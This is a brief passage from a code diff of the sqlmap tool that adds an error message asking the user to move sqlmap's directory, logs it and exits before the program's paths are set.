+            errMsg += "Please move the sqlmap's directory to the other location"
+            logger.error(errMsg)
+            exit()
+
         setPaths()
 
         # Store original command line options for possible later restoration